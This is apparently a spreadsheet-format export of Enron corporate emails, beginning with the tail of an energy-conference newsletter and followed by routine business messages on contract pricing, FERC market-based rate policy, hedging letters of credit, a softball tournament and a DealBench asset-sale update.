  http://www.cbinet.com/_x000D_
_x000D_
2ND ANNUAL CARIBBEAN ENERGY_x000D_
  1/31/02 to 2/1/02 - Miami, FL USA_x000D_
  [ ] 27-7256: Request more information on this listing_x000D_
  http://www.cbinet.com/_x000D_
_x000D_
ADVANCED POWER TRADING_x000D_
  2/1/02 to 2/1/02 - Houston, TX USA_x000D_
  [ ] 27-7389: Request more information on this listing_x000D_
_x000D_
CLEANER COAL TECHNOLOGY AND ITS COMMERCIAL IMPLEMENTATION_x000D_
  2/4/02 to 2/5/02 - London,  England_x000D_
  [ ] 27-7372: Request more information on this listing_x000D_
_x000D_
INTERNATIONAL COLLOQUIUM ON ENVIRONMENTALLY-PREFERRED ADVANCED POWER GENERATION_x000D_
  2/4/02 to 2/7/02 - Newport Beach, CA USA_x000D_
  [ ] 27-7431: Request more information on this listing_x000D_
_x000D_
THE ADVANCED PROJECT FINANCE COURSES_x000D_
  2/4/02 to 2/6/02 - Houston, TX USA_x000D_
  [ ] 27-7276: Request more information on this listing_x000D_
_x000D_
GROUNDING OF ELECTRICAL DISTRIBUTION SYSTEMS_x000D_
  2/4/02 to 2/6/02 - Orlando, FL USA_x000D_
  [ ] 27-7283: Request more information on this listing_x000D_
_x000D_
BUSINESS CONTINUITY &amp; DISASTER RECOVERY PLANNING_x000D_
  2/5/02 to 2/6/02 - New York, NY USA_x000D_
  [ ] 27-7446: Request more information on this listing_x000D_
_x000D_
GLOBAL EXPERTISE 02 - ENERGY MARKETING CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Vaasa,  Finland_x000D_
  [ ] 27-7375: Request more information on this listing_x000D_
_x000D_
FUEL CELL DYNAMICS 2002: REALITY, NOT HYPE_x000D_
  2/6/02 to 2/7/02 - New York, NY USA_x000D_
  [ ] 27-6930: Request more information on this listing_x000D_
  http://www.alliedworld.com_x000D_
  ONLINE REGISTRATION AVAILABLE!_x000D_
  http://www.energycentral.com/go_event.cfm?id=6930 TO REGISTER ONLINE!_x000D_
_x000D_
FUNDAMENTALS OF BUYING AND SELLING ENERGY_x000D_
  2/6/02 to 2/8/02 - San Francisco, CA USA_x000D_
  [ ] 27-7288: Request more information on this listing_x000D_
_x000D_
ANNUAL WORLD CONFERENCE_x000D_
  2/6/02 to 2/8/02 - New Orleans, LA USA_x000D_
  [ ] 27-7312: Request more information on this listing_x000D_
_x000D_
TRANSMISSION EXPANSION AND SYSTEMS IN TRANSITION CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Miami, FL USA_x000D_
  [ ] 27-7322: Request more information on this listing_x000D_
_x000D_
THE ADVANCED PROJECT FINANCE COURSES_x000D_
  2/7/02 to 2/8/02 - Houston, TX USA_x000D_
  [ ] 27-7277: Request more information on this listing_x000D_
_x000D_
NATURAL GAS - 101 SEMINAR_x000D_
  2/7/02 to 2/8/02 - Houston, TX USA_x000D_
  [ ] 27-7470: Request more information on this listing_x000D_
_x000D_
NARUC WINTER COMMITTEE MEETINGS_x000D_
  2/10/02 to 2/13/02 - Washington, DC USA_x000D_
  [ ] 27-7437: Request more information on this listing_x000D_
_x000D_
WINTER CONFERENCE 2002:  TECHNOLOGIES FOR EMERGING ENERGY POLICIES - MEETING ENERGY DEMANDS WITH SECURE, ENVIRONMENTALLY FRIENDLY TECHNOLOGIES_x000D_
  2/11/02 to 2/12/02 - San Francisco, CA USA_x000D_
  [ ] 27-7377: Request more information on this listing_x000D_
_x000D_
THE COMMERCIAL OPPORTUNITIES IN THE GENERATION OF POWER FROM NUCLEAR ENERGY: COMMERCIAL VIABILITY DRIVING INVESTMENT_x000D_
  2/11/02 to 2/12/02 - Rome,  Italy_x000D_
  [ ] 27-7300: Request more information on this listing_x000D_
_x000D_
COMPREHENSIVE 5-DAY TRAINING PROGRAM FOR ENERGY MANAGERS_x000D_
  2/11/02 to 2/15/02 - Miami Beach, FL  USA_x000D_
  [ ] 27-7310: Request more information on this listing_x000D_
_x000D_
THE ELECTRIC WEST SHOW_x000D_
_x000D_
  2/11/02 to 2/13/02 - Las Vegas_x000D_
, NV USA_x000D_
_x000D_
  [ ] 27-7132: Request more information on this listing_x000D_
_x000D_
CERAWEEK 2002 - THE NEW FACE OF RISK: ENERGY STRATEGIES FOR A CHANGED WORLD_x000D_
  2/11/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7462: Request more information on this listing_x000D_
  http://www.cera.com/ceraweek_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  SEARCH THE ENERGY CENTRAL EVENTS DATABASE!!!_x000D_
  Go To:   http://www.energycentral.com/sections/events/_x000D_
____________________________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  DIRECTIONS, INFORMATION AND COPYRIGHT NOTICE_x000D_
____________________________________________________________________________x000D_
_x000D_
  This supplement to the Energy Central Daily News Service is provided _x000D_
  FREE to qualified professionals in the electric power industry._x000D_
  _x000D_
* Visit http://www.energycentral.com/sections/services to START, STOP, _x000D_
  or CHANGE FORMAT for all of your e-mail subscriptions._x000D_
_x000D_
* To BEGIN receiving the Daily News Service directly, send_x000D_
  a message with a subject of 'signup' to service@energycentral.com._x000D_
_x000D_
* To STOP receiving this supplement AND the Daily News Service, _x000D_
  send a message to remove@energycentral.com or call Member Services _x000D_
  at 303-782-5510._x000D_
_x000D_
  This supplement to the Energy Central Daily News Service may be _x000D_
  redistributed provided it is kept in its entirety._x000D_
_x000D_
TO RETRIEVE FULL TEXT ITEMS THROUGH YOUR E-MAIL SYSTEM:_x000D_
  1) Use your mail program to REPLY with the text of this message._x000D_
     (If REPLY is not available, try REDIRECT, FORWARD or RESEND)_x000D_
     (If none of these features are available, copy this message_x000D_
     and paste the text into a new message.)_x000D_
  2) For each item that you would like delivered, type an 'x' between_x000D_
     the brackets associated with that item.  Example: [x]_x000D_
     IMPORTANT: Do not change or delete any other text on that line!_x000D_
  3) Send your request to conferences@mail.energycentral.com._x000D_
     If you used the REPLY feature of your mail program, this address_x000D_
     should already be filled in._x000D_
_x000D_
  Copyright (c) CyberTech, Inc 2001. _x000D_
  Energy Central (r) is a registered trademark of Cybertech, _x000D_
  Incorporated._x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  END OF MESSAGE_x000D_
____________________________________________________________________________x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 00:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryce.baxter@enron.com', 'tricia.truong@enron.com'})</t>
  </si>
  <si>
    <t>Re: Enervest- S#27239</t>
  </si>
  <si>
    <t xml:space="preserve">It's done.  I appologize for this taking so long.  It won't happen again._x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bryce Baxter                           11/09/2000 06:22 PM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc: Tricia Truong/HOU/ECT@ECT _x000D_
Subject: Re: Enervest- S#27239_x000D_
_x000D_
Darron - have you had a chance to take a look at this yet?  If you need _x000D_
additional information or need to meet, please let me know.  Thanks._x000D_
---------------------- Forwarded by Bryce Baxter/HOU/ECT on 11/09/2000 06:21 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Dawn C Kenne_x000D_
10/31/2000 12:02 PM_x000D_
To: Tricia Truong/HOU/ECT@ECT_x000D_
cc: Darron C Giron/HOU/ECT@ECT, Bryce Baxter/HOU/ECT@ECT _x000D_
Subject: Re: Enervest- S#27239  _x000D_
_x000D_
Trisha,  I have changed groups.  Darron Giron is aware of this issue and I am _x000D_
attaching him to this e-mail as well.  Please follow up with him.  _x000D_
_x000D_
Darron, this is that wonderful Enervest issue.  Let me know if you have any _x000D_
questions._x000D_
_x000D_
Dawn_x000D_
_x000D_
_x000D_
To: Dawn C Kenne/HOU/ECT@ECT_x000D_
cc: Bryce Baxter/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Enervest- S#27239_x000D_
_x000D_
Dawn,_x000D_
I just wanted to follow up on this issue with EnerVest.  Could you please let _x000D_
me know ?_x000D_
T  3-9852 _x000D_
---------------------- Forwarded by Tricia Truong/HOU/ECT on 10/30/2000 07:02 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Tricia Truong                           10/23/2000 11:00 AM_x000D_
	_x000D_
_x000D_
To: Dawn C Kenne/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Enervest- S#27239_x000D_
_x000D_
Hello Dawn,_x000D_
I've already received invoice for 9/00 production.  Could you please change _x000D_
its price to 4.417791 (S#27239)?_x000D_
BTW, have you had a chance to look at previous months'? (Please see message _x000D_
below)_x000D_
Thanks so much for your help,_x000D_
T  3-9852_x000D_
_x000D_
---------------------- Forwarded by Tricia Truong/HOU/ECT on 10/23/2000 10:37 _x000D_
AM ---------------------------_x000D_
From: Tricia Truong on 10/11/2000 11:10 AM_x000D_
To: Dawn C Kenne/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Enervest  _x000D_
_x000D_
Hi Dawn,_x000D_
The rate at some locations has not been changed in Sitara.  Are they supposed _x000D_
to be at the same price for all points?_x000D_
Thanks,_x000D_
T  3-9852_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 06:40:24 -0800 (PST)</t>
  </si>
  <si>
    <t>TRV Notification:  (East P/L Totals - 11/19/2001)</t>
  </si>
  <si>
    <t>The report named: East P/L Totals &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=1&amp;report_name=East+P/L+Totals&amp;category_cd=1&amp;category_name=EAST&amp;toc_hide=1&amp;sTV1=1&amp;TV1Exp=Y&amp;current_efct_date=11/19/2001&gt;, published as of 11/19/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Mon, 17 Jul 2000 04:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">My 1,4,and 6 for your 1, 5,7_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 02:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lindy.donoho@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>Max rate issue on TW</t>
  </si>
  <si>
    <t>Steve and Lindy, as I mentioned in our staff meeting, it is probably not=20_x000D_
going to be possible to solve our max rate cap dilemma by making a tariff=_x000D_
=20_x000D_
filing unless we can 1) get FERC to change its mind about its policy that=_x000D_
=20_x000D_
recourse rates always be available as an alternative to negotiated rates or=_x000D_
=20_x000D_
2) prove that Transwestern lacks market power and should therefore be allow=_x000D_
ed=20_x000D_
to charge market based rates._x000D_
_x000D_
The following is a very brief outline of what would be required to prove la=_x000D_
ck=20_x000D_
of market power.  A warning:  lack of market power is very difficult to=20_x000D_
prove.  Koch, a pipeline that most in the industry would agree does lack=20_x000D_
market power, tried and failed.  The deck is already stacked against us in=_x000D_
=20_x000D_
TW's case given the withholding of capacity by El Paso's affiliate and the=_x000D_
=20_x000D_
price conditions in California.  However, we do need to analyze the=20_x000D_
possibilities for TW, if not to the Cal. border, then on other parts of our=_x000D_
=20_x000D_
system.  Additionally, we need to discuss acceptable incentives for shipper=_x000D_
s=20_x000D_
to pay negotiated rates if we do not end up changing our tariff._x000D_
_x000D_
Would you be availabile on Tuesday to discuss this?  Please let me know.  I=_x000D_
n=20_x000D_
the meantime, here is a summary of FERC's policy on market based rates._x000D_
_x000D_
***_x000D_
_x000D_
To obtain authority to charge market based rates, TW would first have to=20_x000D_
request a declaratory order, and in its application provide information=20_x000D_
showing it meets the requirements outlined below.  If the Commission finds=_x000D_
=20_x000D_
all requirements have been met, it will issue an order and TW would then ma=_x000D_
ke=20_x000D_
the appropriate tariff filing to put market based rates into effect._x000D_
=20_x000D_
Application for declaratory order must include:_x000D_
_x000D_
1.  Detailed description of the services proposed for market-based rate=20_x000D_
treatment.  I assume in our case it would be firm transportation service._x000D_
_x000D_
2.  A statement defining the relevant product and geographic markets=20_x000D_
necessary for establishing the applicant lacks market power with respect to=_x000D_
=20_x000D_
the services at issue.  The Commission requires a narrow definition of the=_x000D_
=20_x000D_
market=01("firm transportation" is probably narrow enough, but for our purp=_x000D_
oses=20_x000D_
we might want to narrow it down more (i.e., firm transportation East of=20_x000D_
Thoreau).  We have to define substitute services available to shippers=01(o=_x000D_
ther=20_x000D_
pipelines are a "good substitute" only if shippers can obtain the same=20_x000D_
quality of service on a timely basis, and if the other pipelines offer such=_x000D_
=20_x000D_
service at a price that would deter TW from raising its prices more than=20_x000D_
10%.  All relevant "origin markets" must be defined (Panhandle; West Texas)=_x000D_
=20_x000D_
as well as "destination markets," and alternatives for shippers in those=20_x000D_
markets identified.  Transportation alternatives are only good alternatives=_x000D_
=20_x000D_
if they provide a netback to shippers that is roughly the same as if they=_x000D_
=20_x000D_
used TW.  Note that the Commission has rejected capacity release as a good=_x000D_
=20_x000D_
alternative since it does not guarantee a shipper its desired contract=20_x000D_
quantity._x000D_
_x000D_
3.  Market share and HHI calculations; discussion of other relevant=20_x000D_
competitive factors.  Commission looks at size of market share, mitigating=_x000D_
=20_x000D_
factors such as ease of entry, and market concentration as measured by HHI.=_x000D_
 =20_x000D_
Market concentration has to be calculated for each relevant receipt point a=_x000D_
nd=20_x000D_
delivery point.  HHI is calculated by adding up the total market share and=_x000D_
=20_x000D_
squaring it.  There is a presumption of no ease of entry for transportation=_x000D_
=20_x000D_
services  because of the expense involved in constructing facilities._x000D_
_x000D_
4.  Proposal for accounting for costs and revenues.</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 16:37:14 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/1/02; HourAhead hour: 19;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/1/02; HourAhead hour: 19;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020119.txt</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 11:33:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'aa5458@wayne.edu'})</t>
  </si>
  <si>
    <t>Shana Herrin_x000D_
5130 Commonwealth St_x000D_
Detroit, MI 48208_x000D_
aa5458@wayne.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Shana Herrin</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 02:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Latest turn of doc._x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 19:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fw: ouch!!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by V Charles Weldon/HOU/ECT on 05/10/2001 =_x000D_
04:24 PM ---------------------------_x000D_
_x000D_
Geraldine Irvine_x000D_
_x000D_
05/10/2001 03:27 PM_x000D_
To:=09najjarna@bp.com, sbsh73@msn.com, Angelina V Lorio/HOU/ECT@ECT, Candac=_x000D_
e Womack/Enron@EnronXGate, Carol Short/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt,=_x000D_
 Janet Cones/FGT/Enron@Enron, Kay Young/HOU/ECT@ECT, Marcia A Linton/NA/Enr=_x000D_
on@Enron, Mary Griff Gray/HOU/ECT@ECT, Mary J Heinitz/HOU/ECT@ECT, Mary Jan=_x000D_
e Denson/HOU/ECT@ECT, Ruth Mann/ET&amp;S/Enron@Enron, Sandra R McNichols/HOU/EC=_x000D_
T@ECT, Sandy Hoelscher/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sherri R Saunde=_x000D_
rs/EFS/EES@EES, Maxine E Levingston/Enron@EnronXGate, Janet Butler/Enron@En=_x000D_
ronXGate, aedsall@pdq.net, aojlufkin@earthlink.net, bbenjamin@norwoodaustin=_x000D_
.com, becvar@fbtc.net, Bktank@idworld.net, bmetzger@gte.net, brunorgbc@aol.=_x000D_
com, carmody@gvtc.com, carolem@mail.utexas.edu, cbobs_99@yahoo.com, cdheine=_x000D_
@yahoo.com, cshaner@ev1.net, cdobie@swbell.net, chattingGrandma@hotmail.com=_x000D_
, CKCK@aol.com, dhaug@gvec.net, dmsteele@juno.com, fgordy@inu.net, franznp@=_x000D_
the-cia.net, ginia.bruno@dir.state.tx.us, hagerlin@flash.net, h-jlarson@jun=_x000D_
o.com, jeri.lyn.sump@worldnet.att.net, john_316@swbell.net, jstokes@riviana=_x000D_
.com, keckert99@yahoo.com, kerruish@worldnet.att.net, kpgresham@AOL.Com, ld=_x000D_
ietz@axs4u.net, lfortune@gvec.org, linhmb@aol.com, lschnelle@freewwweb.com,=_x000D_
 mjmcbride@dellnet.com, okkolm@idworld.net, ozcekirchner@lutherweb.net, pam=_x000D_
elia@swbell.net, pjphifer@ltex.net, pwhite98@juno.com, RDBarr@aol.com, rgar=_x000D_
dner@hbu.edu, slmcfarlane@hotmail.com, sordner@tamu.edu, sylviava@juno.com,=_x000D_
 tdierlam@gvtc.com, terryjc@flash.net, texas_import@juno.com, VangieW@swbel=_x000D_
l.net, D' Ann Irvine/Corp/Enron@ENRON, covenant@unidial.com, Darlene C Fors=_x000D_
yth/Enron@EnronXGate, Kay Chapman/HOU/EES@EES, Eric Moon/HOU/ECT@ECT, Eric =_x000D_
Boyt/Corp/Enron@Enron, Steven Curlee/Corp/Enron@Enron, Louis Dicarlo/NA/Enr=_x000D_
on@ENRON, Santiago Garcia/NA/Enron@Enron, Jin Guo/HOU/ECT@ECT, V Charles We=_x000D_
ldon/HOU/ECT@ECT, Melissa Solis/ENRON@enronXgate, Tina Rode/HOU/ECT@ECT_x000D_
cc:=09=20_x000D_
Subject:=09Fw: ouch!!_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Geraldine Irvine/HOU/ECT on 05/10/2001 =_x000D_
03:21 PM ---------------------------_x000D_
_x000D_
_x000D_
"Orline K. Kolm" &lt;okkolm@idworld.net&gt; on 05/09/2001 01:54:39 PM_x000D_
Please respond to "Orline K. Kolm" &lt;okkolm@idworld.net&gt;_x000D_
To:=09&lt;Undisclosed-Recipient:@mailman.enron.com;&gt;_x000D_
cc:=09=20_x000D_
Subject:=09Fw: ouch!!_x000D_
_x000D_
_x000D_
How to...How not to!_x000D_
_x000D_
 - branded_1.mpeg=20_x000D_
 - pic12354.pcx=20_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Aug 2001 14:31:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>Terminal Server2 / Curve Manager</t>
  </si>
  <si>
    <t>The problem reported earlier with Terminal Server 2 and Enpower's Curve Manager have been fixed._x000D_
_x000D_
Michael Tully_x000D_
Application Support, Portland_x000D_
(503)464-7790 Desk_x000D_
(503)807-7862_x000D_
michael.tully@enron.com</t>
  </si>
  <si>
    <t>Thu, 25 Feb 1999 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marc.roche@enron.com'})</t>
  </si>
  <si>
    <t>Re: DPC Naphtha Hedge</t>
  </si>
  <si>
    <t xml:space="preserve">Marc,_x000D_
_x000D_
I agree completely and don't have any legal reason not to send the form of _x000D_
L/C we would require.  Unfortunately, given the nature of this transaction we _x000D_
can't use our standard form but will have to beef it up a bit.  Let me know _x000D_
if you're ready to send that and I'll get started on it right away - _x000D_
shouldn't take more than a day or so to get it ready._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Marc De La Roche_x000D_
02/24/99 06:45 AM_x000D_
To: Mark - ECT Legal Taylor/HOU/ECT@ECT_x000D_
cc: Doug Leach/HOU/ECT@ECT _x000D_
Subject: Re: DPC Naphtha Hedge_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Mark,_x000D_
_x000D_
FYI: Ram Srivastav is the President of DPC. Can we send DPC the format of the _x000D_
Stdby L/C to advance the credit risk portion? We're not committing to _x000D_
actually putting a derivative in place, just familiarizing them with the _x000D_
necessary tools. The legal risk aspect will be covered when we get their _x000D_
outside counsel opinion sent to us. Please let me know. While I feel strongly _x000D_
that we need to cover all of ECT's bases, especially when dealing with the _x000D_
Indians, I don't want to appear to hold up the process. Let me know what you _x000D_
think._x000D_
_x000D_
Marc_x000D_
_x000D_
---------------------- Forwarded by Marc De La Roche/HOU/ECT on 02/24/99 _x000D_
06:40 AM ---------------------------_x000D_
From: Ram Srivastav@ENRON on 02/24/99 08:25 AM_x000D_
To: Vinayak S Bapat, Marc De La Roche/HOU/ECT@ECT_x000D_
cc: Pavan Dave, Doug Leach/HOU/ECT@ECT, Mark - ECT Legal Taylor/HOU/ECT@ECT, _x000D_
Darrell W Kinder AT ENRON_DEVELOPMENT@CCMAIL _x000D_
Subject: Re: DPC Naphtha Hedge_x000D_
_x000D_
_x000D_
While the legal openions are coming - please continue working the rest of the _x000D_
issues and Dont forget that MSEB has to understand and agree to any of these _x000D_
arrangements._x000D_
Ram_x000D_
_x000D_
_x000D_
______________________________ Reply Separator _x000D_
__________________________________x000D_
Subject: DPC Naphtha Hedge_x000D_
Author:  Marc De La Roche/HOU/ECT at ECT_x000D_
Date:    2/23/99 2:55 PM_x000D_
_x000D_
_x000D_
Mood Stamp:  FYI_x000D_
---------------------------------_x000D_
Importance:  High_x000D_
---------------------------------_x000D_
Vinayak,_x000D_
_x000D_
We very much look forward to being able to help DPC mitigate it's fuel price _x000D_
risk by implementing a derivative through ECT._x000D_
_x000D_
ECT's counsel has advised me that the format for the Standby Letter of Credit _x000D_
to cover ECT's exposure on the derivatives will be sent to you/DPC as soon as _x000D_
you provide us with an opinion from outside (non-DPC) Indian counsel on the _x000D_
legality of commodity derivatives in India._x000D_
_x000D_
Pursuant to the above, please obtain a formal opinion from outside (non-DPC) _x000D_
Indian counsel on the legality of commodity derivatives in India, and send it _x000D_
to myself  at your earliest convenience._x000D_
_x000D_
Thanking you in advance,_x000D_
_x000D_
Marc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Softball</t>
  </si>
  <si>
    <t xml:space="preserve">gosset is going to fire me?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Patrick Ryder@ENRON_x000D_
03/28/2001 01:49 PM_x000D_
To: David Baumbach/HOU/ECT@ECT, O'Neal D Winfree/HOU/ECT@ECT, Patrick _x000D_
Ryder/NA/Enron@Enron, Ryan O'Rourke/ENRON@enronXgate, Darron C _x000D_
Giron/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, _x000D_
Bryan Hull/HOU/ECT@ECT, Kevin Bosse/HOU/ECT@ECT, B Scott Palmer/HOU/ECT@ECT, _x000D_
Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Softball_x000D_
_x000D_
_x000D_
Gentlemen,_x000D_
_x000D_
The following are links that have a map and a bracket for the tournament. _x000D_
Our first game is at 8:30 AM on Sunday. We have already lost Darren for the _x000D_
whole tournament and Gosset for at least the first game. _x000D_
Everyone must be there on TIME. That means that you must be at the fields no _x000D_
later than 8 AM! We now only have 10 guys for the first game!!!!!!!_x000D_
_x000D_
If you can't make it at 8 AM, tell me know so we can replace you!!!!! _x000D_
EVERYONE e-mail me and let me know that you will be there by 8 AM! Gosset _x000D_
will fire you if you screw the team!!!!  _x000D_
_x000D_
_x000D_
http://home.enron.com:84/esa/Men.htm_x000D_
_x000D_
_x000D_
_x000D_
http://home.enron.com:84/esa/page7.html_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 08:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Update on Enron Sales Process</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Benjamin Rogers/HOU/ECT on 10/16/2000 _x000D_
03:09 PM ---------------------------_x000D_
_x000D_
_x000D_
"Michael P Cazaubon" &lt;mcazaubon@peco-energy.com&gt; on 10/16/2000 02:55:56 PM_x000D_
To: jinsung.myung@enron.com, don.miller@enron.com_x000D_
cc: benjamin.rogers@enron.com, "Charles P Lewis" &lt;clewis@peco-energy.com&gt;, _x000D_
mcunning@pwrteam.com, "David L Stewart" &lt;u000dls@peco-energy.com&gt;, "Michael J _x000D_
Ricciardi" &lt;mricciardi@peco-energy.com&gt;, "Fred M Valentino" _x000D_
&lt;fvalentino@peco-energy.com&gt; _x000D_
Subject: Update on Enron Sales Process_x000D_
_x000D_
_x000D_
Jinsung and Don,_x000D_
_x000D_
We are continuing to have difficulties accessing data from DealBench.  The_x000D_
response times from PECO, PricewaterhouseCoopers and other high speed_x000D_
internet connections have been very slow (sometimes 5 minutes or more to_x000D_
retrieve a single 10-15 page text document).  It would help us greatly in_x000D_
our due diligence efforts if this material could be made available on CD_x000D_
ROM as has often been done with other deals we have been involved with._x000D_
Please advise if this is possible and if so, when the CD's would be_x000D_
available._x000D_
_x000D_
Mike Cazaubon_x000D_
----- Forwarded by Michael P Cazaubon/Pecon/Genco on 10/16/2000 03:49 PM_x000D_
-----_x000D_
_x000D_
                    Charles P_x000D_
                    Lewis                To:     Michael P _x000D_
Cazaubon/Pecon/Genco@PecoEnergy_x000D_
                                         cc:_x000D_
                    10/16/2000           Subject:     Update on Enron Sales _x000D_
Process_x000D_
                    03:22 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Charles P Lewis/Pecon/Genco on 10/16/00 03:31 PM -----_x000D_
_x000D_
                    "Modi, Rishi"_x000D_
                    &lt;rishi.modi@c        To:     "'clewis@peco-energy.com'" _x000D_
&lt;clewis@peco-energy.com&gt;_x000D_
                    sfb.com&gt;             cc:_x000D_
                                         Subject:     Update on Enron Sales _x000D_
Process_x000D_
                    10/16/00_x000D_
                    02:10 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The following is an update on Enron's sales process, including several_x000D_
additions to DealBench._x000D_
_x000D_
1.  The Purchase and Sale Agreement ("PSA") for each asset has now been_x000D_
posted to DealBench under the New Document section.  Please review the_x000D_
instructions attached to each PSA._x000D_
_x000D_
2. The Management Presentations (with audio) have now been posted to_x000D_
DealBench under the Management Presentation(strikethrough: s) section._x000D_
When attempting to view the presentation, please log onto DealBench using_x000D_
Microsoft Internet Explorer. Once in DealBench, you will most likely need_x000D_
to download "Flash Player" (free download).  You can do this by clicking_x000D_
"Macromedia Flash Player download center" in the Linked Documents section_x000D_
of DealBench.  The download usually takes less than 30 seconds.  After the_x000D_
download, return to the Management Presentation section of DealBench and_x000D_
click on the Management Presentation (with audio).   A power point_x000D_
presentation has also been included in the Management Presentation section_x000D_
of DealBench.   A detailed instruction guide "Instruction for Viewing_x000D_
Management Presentation" has been posted in New Document section of_x000D_
DealBench._x000D_
_x000D_
3.  Please be sure to consistently review the New Documents section on_x000D_
DealBench for any new documents that have been added to DealBench.  Also, a_x000D_
running black line Due Diligence Index is posted in the Due Diligence Index_x000D_
/ Plant Pictures section of DealBench._x000D_
_x000D_
4. Any drawings or CDs that you need from the Due Diligence Indices may be_x000D_
requested by sending an email to don.miller@enron.com or jhoff2@enron.com._x000D_
_x000D_
5.  Any problems or issues that you may be encountering need to  be_x000D_
directed to Jinsung Myung at 713-853-7330._x000D_
_x000D_
6.  We are prepared to schedule Q&amp;A sessions.  Please contact Don Miller at_x000D_
713-853-0492._x000D_
_x000D_
Regards,_x000D_
_x000D_
Don Miller_x000D_
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_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
************************************************************************_x000D_
This e-mail and any of its attachments may contain PECO-Energy_x000D_
proprietary information, which is privileged, confidential, or subject_x000D_
to copyright belonging to the PECO-Energy family of Companies.  This_x000D_
e-mail is intended solely for the use of the individual or entity to_x000D_
which it is addressed.  If you are not the intended recipient of this_x000D_
e-mail, you are hereby notified that any dissemination, distribution,_x000D_
copying, or action taken in relation to the contents of and attachments_x000D_
to this e-mail is strictly prohibited and may be unlawful.  If you have_x000D_
received this e-mail in error, please notify the sender immediately and_x000D_
permanently delete the original and any copy of this e-mail and any_x000D_
printout. Thank You._x000D_
************************************************************************_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 10:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EnronOnline Executive Summary for April 23, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry, Simone.  I don't believe we received it._x000D_
_x000D_
_x000D_
From: Simone La rose/ENRON@enronXgate on 04/24/2001 05:09 PM_x000D_
To: Adam Johnson/ENRON@enronXgate, Amita Gosalia/LON/ECT@ECT, Andy _x000D_
Zipper/ENRON@enronXgate, Bob Crane/ENRON@enronXgate, Bob _x000D_
Shults/ENRON@enronXgate, Bruce Garner/LON/ECT@ECT, Bryan _x000D_
Deluca/ENRON@enronXgate, Cliff Baxter/ENRON@enronXgate, Daniel _x000D_
Diamond/ENRON@enronXgate, Daniel Reck/ENRON@enronXgate, Dave _x000D_
Samuels/ENRON@enronXgate, David Forster/ENRON@enronXgate, Eric _x000D_
Thode/Corp/Enron@ENRON, George Mcclellan/ENRON@enronXgate, Greg _x000D_
Hermans/ENRON@enronXgate, Greg Whalley/HOU/ECT@ECT, Jay _x000D_
Fitzgerald/NY/ECT@ECT, Jeff Skilling/Corp/Enron@ENRON, Jeffrey A _x000D_
Shankman/ENRON@enronXgate, Jeffrey McMahon/ENRON@enronXgate, Jennifer _x000D_
